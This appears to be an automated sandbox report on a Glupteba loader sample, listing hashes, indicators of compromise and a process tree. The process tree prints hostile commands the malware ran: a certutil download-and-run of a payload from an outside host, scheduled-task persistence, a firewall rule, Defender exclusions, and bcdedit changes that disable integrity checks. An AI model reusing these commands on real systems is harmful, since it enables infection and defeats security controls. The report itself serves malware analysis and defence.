glupteba | aae91b20323629b5d0c4a1ed5ad5cf5383730f5233433eba7b450eafec503501

Analysis

max time kernel
115s
max time network
118s
platform
windows7_x64
resource
win7v200722
submitted
25-07-2020 23:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Size

3.8MB
MD5

0d039208c1658b3fc0c7bd9679a1744d
SHA1

adf1b4f1c00301f325036086a882bdb145002588
SHA256

aae91b20323629b5d0c4a1ed5ad5cf5383730f5233433eba7b450eafec503501
SHA512

3e97398f5db4c4549dac9d375e07d4acfc236e477c005d37870b5094d37c27878ab53ad8fadae98fd6f5f3cfc587f0387a2b47a6678234eda3a926797ee23496

Score

10^/10

glupteba discovery dropper evasion loader persistence trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
520	bcdedit.exe
1484	bcdedit.exe
460	bcdedit.exe
1620	bcdedit.exe
908	bcdedit.exe
1020	bcdedit.exe
1680	bcdedit.exe
1604	bcdedit.exe
1864	bcdedit.exe
1048	bcdedit.exe
1500	bcdedit.exe
1152	bcdedit.exe
1876	bcdedit.exe
520	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Executes dropped EXE 5 IoCs

pid	Process
1828	csrss.exe
2000	patch.exe
268	dsefix.exe
1468	windefender.exe
1036	windefender.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00030000000131bf-44.dat	upx
behavioral1/files/0x00030000000131bf-45.dat	upx
behavioral1/files/0x00030000000131bf-48.dat	upx

Loads dropped DLL 12 IoCs

pid	Process
1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
860	Process not Found
2000	patch.exe
2000	patch.exe
2000	patch.exe
2000	patch.exe
2000	patch.exe
2000	patch.exe
2000	patch.exe
2000	patch.exe
1828	csrss.exe

Windows security modification 2 TTPs 12 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\a7f66fedb042\a7f66fedb042 = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a7f66fedb042.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\ThrobbingRain = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\ThrobbingRain = "\"C:\\Windows\\rss\\csrss.exe\""	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
File created	C:\Windows\rss\csrss.exe	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1624	schtasks.exe
1576	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-582 = "North Asia East Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-492 = "India Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-522 = "N. Central Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\24\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	csrss.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
336	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
1828	csrss.exe
1828	csrss.exe
1828	csrss.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	336	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Token: SeImpersonatePrivilege	336	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Token: SeSystemEnvironmentPrivilege	1828	csrss.exe
Token: SeSecurityPrivilege	916	sc.exe
Token: SeSecurityPrivilege	916	sc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1848 wrote to memory of 1920	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	27
PID 1848 wrote to memory of 1920	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	27
PID 1848 wrote to memory of 1920	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	27
PID 1848 wrote to memory of 1920	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	27
PID 1920 wrote to memory of 1792	1920	cmd.exe	29
PID 1920 wrote to memory of 1792	1920	cmd.exe	29
PID 1920 wrote to memory of 1792	1920	cmd.exe	29
PID 1848 wrote to memory of 1828	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	30
PID 1848 wrote to memory of 1828	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	30
PID 1848 wrote to memory of 1828	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	30
PID 1848 wrote to memory of 1828	1848	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	30
PID 2000 wrote to memory of 520	2000	patch.exe	41
PID 2000 wrote to memory of 520	2000	patch.exe	41
PID 2000 wrote to memory of 520	2000	patch.exe	41
PID 2000 wrote to memory of 1484	2000	patch.exe	43
PID 2000 wrote to memory of 1484	2000	patch.exe	43
PID 2000 wrote to memory of 1484	2000	patch.exe	43
PID 2000 wrote to memory of 460	2000	patch.exe	45
PID 2000 wrote to memory of 460	2000	patch.exe	45
PID 2000 wrote to memory of 460	2000	patch.exe	45
PID 2000 wrote to memory of 1620	2000	patch.exe	47
PID 2000 wrote to memory of 1620	2000	patch.exe	47
PID 2000 wrote to memory of 1620	2000	patch.exe	47
PID 2000 wrote to memory of 908	2000	patch.exe	49
PID 2000 wrote to memory of 908	2000	patch.exe	49
PID 2000 wrote to memory of 908	2000	patch.exe	49
PID 2000 wrote to memory of 1020	2000	patch.exe	51
PID 2000 wrote to memory of 1020	2000	patch.exe	51
PID 2000 wrote to memory of 1020	2000	patch.exe	51
PID 2000 wrote to memory of 1680	2000	patch.exe	53
PID 2000 wrote to memory of 1680	2000	patch.exe	53
PID 2000 wrote to memory of 1680	2000	patch.exe	53
PID 2000 wrote to memory of 1604	2000	patch.exe	55
PID 2000 wrote to memory of 1604	2000	patch.exe	55
PID 2000 wrote to memory of 1604	2000	patch.exe	55
PID 2000 wrote to memory of 1864	2000	patch.exe	57
PID 2000 wrote to memory of 1864	2000	patch.exe	57
PID 2000 wrote to memory of 1864	2000	patch.exe	57
PID 2000 wrote to memory of 1048	2000	patch.exe	59
PID 2000 wrote to memory of 1048	2000	patch.exe	59
PID 2000 wrote to memory of 1048	2000	patch.exe	59
PID 2000 wrote to memory of 1500	2000	patch.exe	61
PID 2000 wrote to memory of 1500	2000	patch.exe	61
PID 2000 wrote to memory of 1500	2000	patch.exe	61
PID 2000 wrote to memory of 1152	2000	patch.exe	63
PID 2000 wrote to memory of 1152	2000	patch.exe	63
PID 2000 wrote to memory of 1152	2000	patch.exe	63
PID 2000 wrote to memory of 1876	2000	patch.exe	65
PID 2000 wrote to memory of 1876	2000	patch.exe	65
PID 2000 wrote to memory of 1876	2000	patch.exe	65
PID 1828 wrote to memory of 520	1828	csrss.exe	67
PID 1828 wrote to memory of 520	1828	csrss.exe	67
PID 1828 wrote to memory of 520	1828	csrss.exe	67
PID 1828 wrote to memory of 520	1828	csrss.exe	67
PID 1828 wrote to memory of 268	1828	csrss.exe	69
PID 1828 wrote to memory of 268	1828	csrss.exe	69
PID 1828 wrote to memory of 268	1828	csrss.exe	69
PID 1828 wrote to memory of 268	1828	csrss.exe	69
PID 1468 wrote to memory of 1680	1468	windefender.exe	73
PID 1468 wrote to memory of 1680	1468	windefender.exe	73
PID 1468 wrote to memory of 1680	1468	windefender.exe	73
PID 1468 wrote to memory of 1680	1468	windefender.exe	73
PID 1680 wrote to memory of 916	1680	cmd.exe	75
PID 1680 wrote to memory of 916	1680	cmd.exe	75

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336
- C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
  "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe"
  2⤵
  - Loads dropped DLL
  - Windows security modification
  - Adds Run key to start application
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      PID:1792
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe ""
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1624
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2000
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:520
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1484
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:460
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1620
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:908
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1020
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1680
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1604
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1864
